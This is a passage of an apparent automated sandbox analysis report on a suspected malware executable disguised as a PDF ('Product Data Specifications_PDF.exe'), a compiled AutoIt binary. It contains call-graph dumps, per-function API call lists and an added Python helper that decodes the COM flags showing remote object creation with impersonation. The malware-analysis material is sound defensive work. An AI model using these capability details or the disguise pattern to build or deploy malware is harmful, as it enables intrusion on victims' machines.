calls 87638->87642 87645 41ae51 87638->87645 87640 417f8a __read_nolock 46 API calls 87639->87640 87641 41adff 87640->87641 87643 417f77 __wsplitpath_helper 46 API calls 87641->87643 87644 41ae23 87642->87644 87646 41ae07 87643->87646 87647 417f77 __wsplitpath_helper 46 API calls 87644->87647 87645->87617 87646->87617 87648 41ae2b 87647->87648 87649 417f25 __wsplitpath_helper 10 API calls 87648->87649 87649->87646 87650->87623 87651->87626 87653 414c82 __tsopen_nolock 87652->87653 87654 414cc3 87653->87654 87655 414cbb __tsopen_nolock 87653->87655 87660 414c96 _memcpy_s 87653->87660 87656 415471 __lock_file 47 API calls 87654->87656 87655->87323 87657 414ccb 87656->87657 87665 414aba 87657->87665 87679 417f77 46 API calls __getptd_noexit 87660->87679 87661 414cb0 87680 417f25 10 API calls __wsplitpath_helper 87661->87680 87668 414ad8 _memcpy_s 87665->87668 87671 414af2 87665->87671 87666 414ae2 87732 417f77 46 API calls __getptd_noexit 87666->87732 87668->87666 87668->87671 87675 414b2d 87668->87675 87681 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87671->87681 87672 414c38 _memcpy_s 87735 417f77 46 API calls __getptd_noexit 87672->87735 87673 414139 __fflush_nolock 46 API calls 87673->87675 87675->87671 87675->87672 87675->87673 87682 41dfcc 87675->87682 87712 41d8f3 87675->87712 87734 41e0c2 46 API calls 3 library calls 87675->87734 87678 414ae7 87733 417f25 10 API calls __wsplitpath_helper 87678->87733 87679->87661 87680->87655 87681->87655 87683 41dfd8 __tsopen_nolock 87682->87683 87684 41dfe0 87683->87684 87685 41dffb 87683->87685 87805 417f8a 46 API calls __getptd_noexit 87684->87805 87686 41e007 87685->87686 87691 41e041 87685->87691 87807 417f8a 46 API calls __getptd_noexit 87686->87807 87689 41dfe5 87806 417f77 46 API calls __getptd_noexit 87689->87806 87690 41e00c 87808 417f77 46 API calls __getptd_noexit 87690->87808 87694 41e063 87691->87694 87695 41e04e 87691->87695 87696 41ae56 ___lock_fhandle 48 API calls 87694->87696 87810 417f8a 46 
API calls __getptd_noexit 87695->87810 87700 41e069 87696->87700 87697 41e014 87809 417f25 10 API calls __wsplitpath_helper 87697->87809 87699 41e053 87811 417f77 46 API calls __getptd_noexit 87699->87811 87703 41e077 87700->87703 87704 41e08b 87700->87704 87702 41dfed __tsopen_nolock 87702->87675 87736 41da15 87703->87736 87812 417f77 46 API calls __getptd_noexit 87704->87812 87708 41e083 87814 41e0ba LeaveCriticalSection __unlock_fhandle 87708->87814 87709 41e090 87813 417f8a 46 API calls __getptd_noexit 87709->87813 87713 41d900 87712->87713 87717 41d915 87712->87717 87818 417f77 46 API calls __getptd_noexit 87713->87818 87715 41d905 87819 417f25 10 API calls __wsplitpath_helper 87715->87819 87718 41d94a 87717->87718 87723 41d910 87717->87723 87815 420603 87717->87815 87720 414139 __fflush_nolock 46 API calls 87718->87720 87721 41d95e 87720->87721 87722 41dfcc __read 59 API calls 87721->87722 87724 41d965 87722->87724 87723->87675 87724->87723 87725 414139 __fflush_nolock 46 API calls 87724->87725 87726 41d988 87725->87726 87726->87723 87727 414139 __fflush_nolock 46 API calls 87726->87727 87728 41d994 87727->87728 87728->87723 87729 414139 __fflush_nolock 46 API calls 87728->87729 87730 41d9a1 87729->87730 87731 414139 __fflush_nolock 46 API calls 87730->87731 87731->87723 87732->87678 87733->87671 87734->87675 87735->87678 87737 41da31 87736->87737 87738 41da4c 87736->87738 87739 417f8a __read_nolock 46 API calls 87737->87739 87740 41da5b 87738->87740 87742 41da7a 87738->87742 87741 41da36 87739->87741 87743 417f8a __read_nolock 46 API calls 87740->87743 87745 417f77 __wsplitpath_helper 46 API calls 87741->87745 87744 41da98 87742->87744 87758 41daac 87742->87758 87746 41da60 87743->87746 87747 417f8a __read_nolock 46 API calls 87744->87747 87759 41da3e 87745->87759 87749 417f77 __wsplitpath_helper 46 API calls 87746->87749 87751 41da9d 87747->87751 87748 41db02 87750 417f8a __read_nolock 46 API calls 87748->87750 87752 41da67 87749->87752 87753 41db07 
87750->87753 87754 417f77 __wsplitpath_helper 46 API calls 87751->87754 87755 417f25 __wsplitpath_helper 10 API calls 87752->87755 87756 417f77 __wsplitpath_helper 46 API calls 87753->87756 87757 41daa4 87754->87757 87755->87759 87756->87757 87761 417f25 __wsplitpath_helper 10 API calls 87757->87761 87758->87748 87758->87759 87760 41dae1 87758->87760 87762 41db1b 87758->87762 87759->87708 87760->87748 87767 41daec ReadFile 87760->87767 87761->87759 87764 416b04 __malloc_crt 46 API calls 87762->87764 87768 41db31 87764->87768 87765 41dc17 87766 41df8f GetLastError 87765->87766 87773 41dc2b 87765->87773 87769 41de16 87766->87769 87770 41df9c 87766->87770 87767->87765 87767->87766 87771 41db59 87768->87771 87772 41db3b 87768->87772 87779 417f9d __dosmaperr 46 API calls 87769->87779 87785 41dd9b 87769->87785 87775 417f77 __wsplitpath_helper 46 API calls 87770->87775 87774 420494 __lseeki64_nolock 48 API calls 87771->87774 87776 417f77 __wsplitpath_helper 46 API calls 87772->87776 87784 41de5b 87773->87784 87773->87785 87788 41dc47 87773->87788 87777 41db67 87774->87777 87778 41dfa1 87775->87778 87780 41db40 87776->87780 87777->87767 87781 417f8a __read_nolock 46 API calls 87778->87781 87779->87785 87782 417f8a __read_nolock 46 API calls 87780->87782 87781->87785 87782->87759 87783 413748 _free 46 API calls 87783->87759 87784->87785 87786 41ded0 ReadFile 87784->87786 87785->87759 87785->87783 87792 41deef GetLastError 87786->87792 87797 41def9 87786->87797 87787 41dd28 87787->87785 87795 41dda3 87787->87795 87796 41dd96 87787->87796 87802 41dd60 87787->87802 87788->87787 87789 41dcab ReadFile 87788->87789 87790 41dcd3 87789->87790 87791 41dcc9 GetLastError 87789->87791 87790->87788 87800 420494 __lseeki64_nolock 48 API calls 87790->87800 87791->87788 87791->87790 87792->87784 87792->87797 87793 41ddec MultiByteToWideChar 87793->87785 87794 41de10 GetLastError 87793->87794 87794->87769 87799 41ddda 87795->87799 87795->87802 87798 417f77 __wsplitpath_helper 46 API calls 
87796->87798 87797->87784 87801 420494 __lseeki64_nolock 48 API calls 87797->87801 87798->87785 87803 420494 __lseeki64_nolock 48 API calls 87799->87803 87800->87790 87801->87797 87802->87793 87804 41dde9 87803->87804 87804->87793 87805->87689 87806->87702 87807->87690 87808->87697 87809->87702 87810->87699 87811->87697 87812->87709 87813->87708 87814->87702 87816 416b04 __malloc_crt 46 API calls 87815->87816 87817 420618 87816->87817 87817->87718 87818->87715 87819->87723 87823 4148b3 GetSystemTimeAsFileTime __aulldiv 87820->87823 87822 442c6b 87822->87326 87823->87822 87824->87333 87825->87337 87826->87337 87832 45272f __tzset_nolock _wcscpy 87827->87832 87828 44afef GetSystemTimeAsFileTime 87828->87832 87829 4528a4 87829->87248 87829->87249 87830 414d04 61 API calls __fread_nolock 87830->87832 87831 4150d1 81 API calls _fseek 87831->87832 87832->87828 87832->87829 87832->87830 87832->87831 87834 44b1bc 87833->87834 87835 44b1ca 87833->87835 87836 4149c2 116 API calls 87834->87836 87837 44b1e1 87835->87837 87838 4149c2 116 API calls 87835->87838 87839 44b1d8 87835->87839 87836->87835 87868 4321a4 87837->87868 87840 44b2db 87838->87840 87839->87276 87840->87837 87842 44b2e9 87840->87842 87844 44b2f6 87842->87844 87847 414a46 __fcloseall 82 API calls 87842->87847 87843 44b224 87845 44b253 87843->87845 87846 44b228 87843->87846 87844->87276 87872 43213d 87845->87872 87849 44b235 87846->87849 87851 414a46 __fcloseall 82 API calls 87846->87851 87847->87844 87852 414a46 __fcloseall 82 API calls 87849->87852 87855 44b245 87849->87855 87850 44b25a 87853 44b289 87850->87853 87856 44b260 87850->87856 87851->87849 87852->87855 87882 44b0bf 87 API calls 87853->87882 87855->87276 87857 44b26d 87856->87857 87859 414a46 __fcloseall 82 API calls 87856->87859 87860 44b27d 87857->87860 87862 414a46 __fcloseall 82 API calls 87857->87862 87858 44b28f 87883 4320f8 46 API calls _free 87858->87883 87859->87857 87860->87276 87862->87860 87863 44b295 87864 44b2a2 87863->87864 87865 
414a46 __fcloseall 82 API calls 87863->87865 87866 44b2b2 87864->87866 87867 414a46 __fcloseall 82 API calls 87864->87867 87865->87864 87866->87276 87867->87866 87869 4321cb 87868->87869 87871 4321b4 __tzset_nolock _memmove 87868->87871 87870 414d04 __fread_nolock 61 API calls 87869->87870 87870->87871 87871->87843 87873 4135bb _malloc 46 API calls 87872->87873 87874 432150 87873->87874 87875 4135bb _malloc 46 API calls 87874->87875 87876 432162 87875->87876 87877 4135bb _malloc 46 API calls 87876->87877 87878 432174 87877->87878 87881 432189 87878->87881 87884 4320f8 46 API calls _free 87878->87884 87880 432198 87880->87850 87881->87850 87882->87858 87883->87863 87884->87880 87885->87178 87886->87181 87887->87199 87888->87199 87889->87199 87890->87190 87891->87199 87892->87199 87893->87203 87894->87212 87895->87214 87896->87214 87946 410160 87897->87946 87899 41012f GetFullPathNameW 87900 410147 moneypunct 87899->87900 87900->87033 87902 4102cb SHGetDesktopFolder 87901->87902 87905 410333 _wcsncpy 87901->87905 87903 4102e0 _wcsncpy 87902->87903 87902->87905 87904 41031c SHGetPathFromIDListW 87903->87904 87903->87905 87904->87905 87905->87037 87907 4101bb 87906->87907 87909 425f4a 87906->87909 87908 410160 52 API calls 87907->87908 87910 4101c7 87908->87910 87911 4114ab __wcsicoll 58 API calls 87909->87911 87914 425f6e 87909->87914 87950 410200 52 API calls 2 library calls 87910->87950 87911->87909 87913 4101d6 87951 410200 52 API calls 2 library calls 87913->87951 87914->87039 87916 4101e9 87916->87039 87918 40f760 128 API calls 87917->87918 87919 40f584 87918->87919 87920 429335 87919->87920 87921 40f58c 87919->87921 87924 4528bd 118 API calls 87920->87924 87922 40f598 87921->87922 87923 429358 87921->87923 87976 4033c0 113 API calls 7 library calls 87922->87976 87977 434034 86 API calls _wprintf 87923->87977 87926 42934b 87924->87926 87929 429373 87926->87929 87930 42934f 87926->87930 87928 40f5b4 87928->87036 87933 4115d7 52 API calls 87929->87933 87932 431e58 
82 API calls 87930->87932 87931 429369 87931->87929 87932->87923 87943 4293c5 moneypunct 87933->87943 87934 42959c 87935 413748 _free 46 API calls 87934->87935 87936 4295a5 87935->87936 87937 431e58 82 API calls 87936->87937 87938 4295b1 87937->87938 87942 401b10 52 API calls 87942->87943 87943->87934 87943->87942 87952 444af8 87943->87952 87955 44b41c 87943->87955 87962 402780 87943->87962 87970 4022d0 87943->87970 87978 44c7dd 64 API calls 3 library calls 87943->87978 87947 410167 _wcslen 87946->87947 87948 4115d7 52 API calls 87947->87948 87949 41017e _wcscpy 87948->87949 87949->87899 87950->87913 87951->87916 87953 4115d7 52 API calls 87952->87953 87954 444b27 _memmove 87953->87954 87954->87943 87956 44b429 87955->87956 87957 4115d7 52 API calls 87956->87957 87958 44b440 87957->87958 87959 44b45e 87958->87959 87960 401b10 52 API calls 87958->87960 87959->87943 87961 44b453 87960->87961 87961->87943 87963 402827 87962->87963 87968 402790 moneypunct _memmove 87962->87968 87965 4115d7 52 API calls 87963->87965 87964 4115d7 52 API calls 87966 402797 87964->87966 87965->87968 87967 4115d7 52 API calls 87966->87967 87969 4027bd 87966->87969 87967->87969 87968->87964 87969->87943 87972 4022e0 87970->87972 87973 40239d 87970->87973 87971 402320 moneypunct 87971->87973 87975 4115d7 52 API calls 87971->87975 87972->87971 87972->87973 87974 4115d7 52 API calls 87972->87974 87973->87943 87974->87971 87975->87971 87976->87928 87977->87931 87978->87943 87980 402417 87979->87980 87984 402539 moneypunct 87979->87984 87981 4115d7 52 API calls 87980->87981 87980->87984 87982 402443 87981->87982 87983 4115d7 52 API calls 87982->87983 87985 4024b4 87983->87985 87984->87043 87985->87984 87987 4022d0 52 API calls 87985->87987 88008 402880 95 API calls 2 library calls 87985->88008 87987->87985 87992 401566 87988->87992 87989 401794 88009 40e9a0 90 API calls 87989->88009 87991 40167a 87995 4017c0 87991->87995 88010 45e737 90 API calls 3 library calls 87991->88010 87992->87989 
87992->87991 87994 4010a0 52 API calls 87992->87994 87994->87992 87995->87045 87997 40bc70 52 API calls 87996->87997 88006 40d451 87997->88006 87998 40d50f 88013 410600 52 API calls 87998->88013 88000 427c01 88014 45e737 90 API calls 3 library calls 88000->88014 88001 40e0a0 52 API calls 88001->88006 88003 401b10 52 API calls 88003->88006 88004 40d519 88004->87048 88006->87998 88006->88000 88006->88001 88006->88003 88006->88004 88011 40f310 53 API calls 88006->88011 88012 40d860 91 API calls 88006->88012 88008->87985 88009->87991 88010->87995 88011->88006 88012->88006 88013->88004 88014->88004 88015->87061 88016->87062 88018 42c5fe 88017->88018 88033 4091c6 88017->88033 88019 40bc70 52 API calls 88018->88019 88018->88033 88020 42c64e InterlockedIncrement 88019->88020 88021 42c665 88020->88021 88026 42c697 88020->88026 88023 42c672 InterlockedDecrement Sleep InterlockedIncrement 88021->88023 88021->88026 88022 42c737 InterlockedDecrement 88024 42c74a 88022->88024 88023->88021 88023->88026 88027 408f40 VariantClear 88024->88027 88025 42c731 88025->88022 88026->88022 88026->88025 88310 408e80 88026->88310 88029 42c752 88027->88029 88323 410c60 VariantClear moneypunct 88029->88323 88033->87124 88034 42c6db 88035 402160 52 API calls 88034->88035 88036 42c6e5 88035->88036 88037 45340c 85 API calls 88036->88037 88038 42c6f1 88037->88038 88320 40d200 52 API calls 2 library calls 88038->88320 88040 42c6fb 88321 465124 53 API calls 88040->88321 88042 42c715 88043 42c76a 88042->88043 88044 42c719 88042->88044 88045 401b10 52 API calls 88043->88045 88322 46fe32 VariantClear 88044->88322 88047 42c77e 88045->88047 88048 401980 53 API calls 88047->88048 88049 42c796 88048->88049 88050 42c812 88049->88050 88054 42c864 88049->88054 88324 40ba10 88049->88324 88330 46fe32 VariantClear 88050->88330 88052 42c82a InterlockedDecrement 88331 46ff07 54 API calls 88052->88331 88332 45e737 90 API calls 3 library calls 88054->88332 88056 42c9ec 88375 47d33e 330 API calls 88056->88375 88061 
                              Control-flow Graph (IDA plugin node/edge list; rendered graph not captured)
                              APIs
                              • _wcslen.LIBCMT ref: 004096C1
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 0040970C
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                              • _memmove.LIBCMT ref: 00409D96
                              • _memmove.LIBCMT ref: 0040A6C4
                              • _memmove.LIBCMT ref: 004297E5
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                              • String ID:
                              • API String ID: 2383988440-0
                              • Opcode ID: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                              • Opcode Fuzzy Hash: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                              • String ID: C:\Users\user\Desktop\Product Data Specifications_PDF.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                              • API String ID: 2495805114-3439111204
                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                              Control-flow Graph

                              • Executed / Not Executed (graph legend)
                              Control-flow Graph for function 0046CB5F (OleInitialize, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket path; IDA plugin block list, rendered graph not captured)
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                              • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                              • _wcslen.LIBCMT ref: 0046CDB0
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                              Strings
                              • NULL Pointer assignment, xrefs: 0046CEA6
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                              • String ID: NULL Pointer assignment
                              • API String ID: 440038798-2785691316
                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
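The function at 0046CB5F is the AutoIt runtime's object-creation path: ProgID or CLSID string to CLSID, then CoCreateInstance for the local case or CoCreateInstanceEx with a COSERVERINFO (the unresolved fourth argument) for a remote host, followed by CoSetProxyBlanket. The sandbox prints the arguments as raw hex, so the analyst has to decode them to see what the embedded interpreter is able to do. The following is an added example, not Joe Sandbox output: it parses the "APIs" bullets of this record and names the CLSCTX, RPC_C_AUTHN_LEVEL, RPC_C_IMP_LEVEL and EOAC values using the constants from the Windows SDK headers. The argument positions assumed for each API follow the documented prototypes.

```python
"""Decode the COM arguments Joe Sandbox lists for the ObjCreate-style
function at 0046CB5F. Added example for this report (not Joe Sandbox code).
Constant names and values come from the Windows SDK headers (objbase.h,
rpcdce.h, objidl.h); the API lines are copied from the record above."""
import re
from typing import Optional

CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
EOAC = {0x1: "EOAC_MUTUAL_AUTH", 0x20: "EOAC_STATIC_CLOAKING",
        0x40: "EOAC_DYNAMIC_CLOAKING", 0x800: "EOAC_DEFAULT"}
AUTHN_LEVEL = ["RPC_C_AUTHN_LEVEL_DEFAULT", "RPC_C_AUTHN_LEVEL_NONE",
               "RPC_C_AUTHN_LEVEL_CONNECT", "RPC_C_AUTHN_LEVEL_CALL",
               "RPC_C_AUTHN_LEVEL_PKT", "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"]
IMP_LEVEL = ["RPC_C_IMP_LEVEL_DEFAULT", "RPC_C_IMP_LEVEL_ANONYMOUS",
             "RPC_C_IMP_LEVEL_IDENTIFY", "RPC_C_IMP_LEVEL_IMPERSONATE",
             "RPC_C_IMP_LEVEL_DELEGATE"]

# Zero-based argument positions that carry flags, per the SDK prototypes.
FLAG_ARGS = {
    "CoCreateInstance":     {2: "CLSCTX"},
    "CoCreateInstanceEx":   {2: "CLSCTX"},
    "CoInitializeSecurity": {4: "AUTHN_LEVEL", 5: "IMP_LEVEL", 7: "EOAC"},
    "CoSetProxyBlanket":    {4: "AUTHN_LEVEL", 5: "IMP_LEVEL", 7: "EOAC"},
}

# "• Name.MODULE(arg,arg,...), ref: ADDR" or "• _name.LIBCMT ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*([A-Za-z_]\w*)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def _arg(text: str):
    text = text.strip()
    if text == "?":            # sandbox could not resolve the value
        return None
    try:
        return int(text, 16)
    except ValueError:
        return text            # string argument such as a DLL name

def parse_api_line(line: str) -> Optional[dict]:
    """Parse one 'APIs' bullet; 'Part of subcall function' lines give None."""
    m = API_LINE.match(line)
    if not m:
        return None
    name, module, raw_args, ref = m.groups()
    args = [] if raw_args is None else [_arg(a) for a in raw_args.split(",")]
    return {"api": name, "module": module, "args": args, "ref": int(ref, 16)}

def decode_bits(value: int, table: dict, zero: str = "0") -> str:
    """Name every set bit; bits not in the table are kept as hex."""
    names = [n for bit, n in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) if names else zero

def decode_call(call: dict) -> dict:
    out = {}
    for idx, kind in FLAG_ARGS.get(call["api"], {}).items():
        v = call["args"][idx] if idx < len(call["args"]) else None
        if not isinstance(v, int):
            out[kind] = "unresolved"
        elif kind == "CLSCTX":
            out[kind] = decode_bits(v, CLSCTX)
        elif kind == "EOAC":
            out[kind] = decode_bits(v, EOAC, zero="EOAC_NONE")
        elif kind == "AUTHN_LEVEL":
            out[kind] = AUTHN_LEVEL[v] if v < len(AUTHN_LEVEL) else hex(v)
        else:
            out[kind] = IMP_LEVEL[v] if v < len(IMP_LEVEL) else hex(v)
    return out

def annotate(lines) -> list:
    calls = []
    for line in lines:
        call = parse_api_line(line)
        if call is not None:
            call["decoded"] = decode_call(call)
            calls.append(call)
    return calls

# The "APIs" bullets of the record above, verbatim.
RECORD_LINES = [
    "• OleInitialize.OLE32(00000000), ref: 0046CBC7",
    "• CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF",
    "• CLSIDFromString.OLE32(?,?), ref: 0046CBF1",
    "• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56",
    "• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA",
    "• _wcslen.LIBCMT ref: 0046CDB0",
    "• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33",
    "• CoTaskMemFree.OLE32(?), ref: 0046CE42",
    "• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85",
    "  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0",
]

if __name__ == "__main__":
    for c in annotate(RECORD_LINES):
        print(f"{c['ref']:08X} {c['api']:<22} {c['decoded']}")
```

Decoded, CoCreateInstanceEx uses CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER with a non-null COSERVERINFO, and CoInitializeSecurity asks for RPC_C_AUTHN_LEVEL_CONNECT with RPC_C_IMP_LEVEL_IMPERSONATE, so scripts run by this interpreter can instantiate COM objects (WMI among them) on remote hosts under the caller's identity. This is the stock AutoIt runtime, so treat it as a capability of the embedded interpreter, not as evidence that the FormBook loader script exercises it; the behaviour section of the report is where that would show.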

                               Control-flow Graph (rendered graph omitted; recoverable content: basic blocks 0040E500-0040E65D with out-of-line blocks 00427625-004276DF, edges flagged Executed / Not Executed; API calls in block order: GetVersionExW, GetCurrentProcess, GetSystemInfo (two sites), GetNativeSystemInfo, FreeLibrary (two sites))
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
